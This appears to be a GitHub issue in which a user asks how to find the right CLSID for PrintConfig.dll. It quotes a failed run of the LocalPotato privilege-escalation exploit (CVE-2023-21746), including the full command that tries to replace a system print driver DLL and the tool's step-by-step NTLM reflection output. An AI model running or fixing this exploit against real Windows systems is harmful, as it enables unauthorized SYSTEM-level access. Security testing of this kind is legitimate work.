PrintConfig #9
Description
no offense how i get the correct CLSID from PrintConfig.dll or from the sandbox where i want test
i generate one : {e60687f7-01a1-40aa-86ac-db1cbf673334}
C:\Users\testing\Desktop\4.7.2>LocalPotato.exe -i C:\Users\testing\Downloads\x64.dll -o C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
LocalPotato (aka CVE-2023-21746 & HTTP/WebDAV)
by splinter_code & decoder_it
[] Objref Moniker Display Name = objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGAQAAAAAAAABjde89w5iZzGMBR4la7cLsAVAAAAADZB2Utz50rls7uy4AGAAHAEUAUgBJAFQARQBSAE0AAAAHADEAOQAyAC4AMQA2ADgALgA3ADUALgAzAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[] Calling CoGetInstanceFromIStorage with CLSID:{e60687f7-01a1-40aa-86ac-db1cbf673334}
[] Marshalling the IStorage object... IStorageTrigger written: 100 bytes
[] Received DCOM NTLM type 1 authentication from the privileged client
[] Connected to the SMB server with ip 127.0.0.1 and port 445
[+] SMB Client Auth Context swapped with SYSTEM
[+] RPC Server Auth Context swapped with the Current User
[] Received DCOM NTLM type 3 authentication from the privileged client
[!] SMB reflected DCOM authentication failed with status code 0xc0000022
[!] SMB Connect Tree: \127.0.0.1\c$ failed with status code 0xc0000203
C:\Users\testing\Desktop\4.7.2>`